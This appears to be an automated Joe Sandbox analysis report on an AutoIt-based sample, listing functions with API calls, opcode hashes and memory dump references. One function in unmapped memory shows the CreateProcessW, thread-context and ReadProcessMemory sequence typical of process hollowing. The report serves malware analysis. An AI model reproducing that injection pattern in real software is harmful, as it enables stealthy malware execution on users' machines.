                                                                                                                                                                  control_flow_graph 2414 44012e8-4401388 call 4403738 * 3 2421 440138a-4401394 2414->2421 2422 440139f 2414->2422 2421->2422 2424 4401396-440139d 2421->2424 2423 44013a6-44013af 2422->2423 2425 44013b6-4401a68 2423->2425 2424->2423 2426 4401a6a-4401a6e 2425->2426 2427 4401a7b-4401aa8 CreateProcessW 2425->2427 2428 4401a70-4401a74 2426->2428 2429 4401ab4-4401ae1 2426->2429 2433 4401ab2 2427->2433 2434 4401aaa-4401aad 2427->2434 2430 4401a76 2428->2430 2431 4401aed-4401b1a 2428->2431 2449 4401ae3-4401ae6 2429->2449 2450 4401aeb 2429->2450 2435 4401b24-4401b3e Wow64GetThreadContext 2430->2435 2431->2435 2456 4401b1c-4401b1f 2431->2456 2433->2435 2437 4401ea9-4401eab 2434->2437 2438 4401b40 2435->2438 2439 4401b45-4401b60 ReadProcessMemory 2435->2439 2443 4401e52-4401e56 2438->2443 2441 4401b62 2439->2441 2442 4401b67-4401b70 2439->2442 2441->2443 2445 4401b72-4401b81 2442->2445 2446 4401b99-4401bb8 call 4402db8 2442->2446 2447 4401ea7 2443->2447 2448 4401e58-4401e5c 2443->2448 2445->2446 2452 4401b83-4401b92 call 4402d08 2445->2452 2463 4401bba 2446->2463 2464 4401bbf-4401be2 call 4402ef8 2446->2464 2447->2437 2453 4401e71-4401e75 2448->2453 2454 4401e5e-4401e6a 2448->2454 2449->2437 2450->2435 2452->2446 2469 4401b94 2452->2469 2458 4401e81-4401e85 2453->2458 2459 4401e77-4401e7a 2453->2459 2454->2453 2456->2435 2456->2437 2465 4401e91-4401e95 2458->2465 2466 4401e87-4401e8a 2458->2466 2459->2458 2463->2443 2473 4401be4-4401beb 2464->2473 2474 4401c2c-4401c4d call 4402ef8 2464->2474 2467 4401ea2-4401ea5 2465->2467 2468 4401e97-4401e9d call 4402d08 2465->2468 2466->2465 2467->2437 2468->2467 2469->2443 2475 4401c27 2473->2475 2476 4401bed-4401c1e call 4402ef8 2473->2476 2481 4401c54-4401c72 call 4403758 2474->2481 2482 4401c4f 2474->2482 2475->2443 2483 4401c20 2476->2483 2484 4401c25 2476->2484 2487 4401c7d-4401c87 2481->2487 2482->2443 2483->2443 2484->2474 2488 4401c89-4401cbb call 4403758 2487->2488 2489 4401cbd-4401cc1 2487->2489 2488->2487 2491 4401cc7-4401cd7 2489->2491 2492 4401dac-4401dc9 call 4402908 2489->2492 2491->2492 2494 4401cdd-4401ced 2491->2494 2499 4401dd0-4401def Wow64SetThreadContext 2492->2499 2500 4401dcb 2492->2500 2494->2492 2498 4401cf3-4401d17 2494->2498 2501 4401d1a-4401d1e 2498->2501 2502 4401df1 2499->2502 2503 4401df3-4401dfe call 4402c38 2499->2503 2500->2443 2501->2492 2504 4401d24-4401d39 2501->2504 2502->2443 2510 4401e00 2503->2510 2511 4401e02-4401e06 2503->2511 2506 4401d4d-4401d51 2504->2506 2508 4401d53-4401d5f 2506->2508 2509 4401d8f-4401da7 2506->2509 2512 4401d61-4401d8b 2508->2512 2513 4401d8d 2508->2513 2509->2501 2510->2443 2514 4401e12-4401e16 2511->2514 2515 4401e08-4401e0b 2511->2515 2512->2513 2513->2506 2517 4401e22-4401e26 2514->2517 2518 4401e18-4401e1b 2514->2518 2515->2514 2519 4401e32-4401e36 2517->2519 2520 4401e28-4401e2b 2517->2520 2518->2517 2521 4401e43-4401e4c 2519->2521 2522 4401e38-4401e3e call 4402d08 2519->2522 2520->2519 2521->2425 2521->2443 2522->2521
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04401AA3
                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04401B39
                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04401B5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                                                  • Opcode ID: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
                                                                                                                                                                  • Instruction ID: a9ae909b724ec971fa2768380a0342a3829e2ee2b6e794d4d3f120ddfbf8fcf0
                                                                                                                                                                  • Opcode Fuzzy Hash: 86d3f5362505df67a9802f6ff4ae5504519ef5f7159c53e5db4ac50a1c40347f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B62EB30A146589BEB24DFA4C850BDEB376EF58300F1091A9D10DEB3D0E776AE91CB59
                                                                                                                                                                  Function 0040E360 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNameOpen
                                                                                                                                                                  • String ID: Include$\
                                                                                                                                                                  • API String ID: 1506145535-3429789819
                                                                                                                                                                  • Opcode ID: 37ca38a5db4ef05eb1e0e5fabb9f05a74c8a0da3bb851e953f3a10516ddaaf28
                                                                                                                                                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                                  • Opcode Fuzzy Hash: 37ca38a5db4ef05eb1e0e5fabb9f05a74c8a0da3bb851e953f3a10516ddaaf28
                                                                                                                                                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                                                                  Function 00401B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoadNotifyShell_String
                                                                                                                                                                  • String ID: Line:
                                                                                                                                                                  • API String ID: 3363329723-1585850449
                                                                                                                                                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                                  Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
                                                                                                                                                                  • String ID: X$pWH
                                                                                                                                                                  • API String ID: 819131735-941433119
                                                                                                                                                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                                  Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                  Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2429186680-0
                                                                                                                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                                  Function 004102B0 Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DesktopFolderFromListMallocPath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2281215042-0
                                                                                                                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                  Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                  • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                  • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                  Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                  • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                  • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                                                                  • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                                                                  Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: f324077346500a475a04602cd4b44258b9806dd725a659715d7844d6d80d8dc3
                                                                                                                                                                  • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                                                  • Opcode Fuzzy Hash: f324077346500a475a04602cd4b44258b9806dd725a659715d7844d6d80d8dc3
                                                                                                                                                                  • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                                                                  Function 00416454 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?,0048D0C8,00000058), ref: 00416464
                                                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 00416503
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CommandInfoLineStartup
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 582193876-0
                                                                                                                                                                  • Opcode ID: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
                                                                                                                                                                  • Instruction ID: ac7b2a7a110525a15761c18fac9a87cb5f7107ef6e751cb88c520a6366d35d41
                                                                                                                                                                  • Opcode Fuzzy Hash: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
                                                                                                                                                                  • Instruction Fuzzy Hash: AA317070940310AADB24BBB2A846BEE3674AF10759F11442FF505AA1D6EB7CC9C1CB9D
                                                                                                                                                                  Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3403648963-0
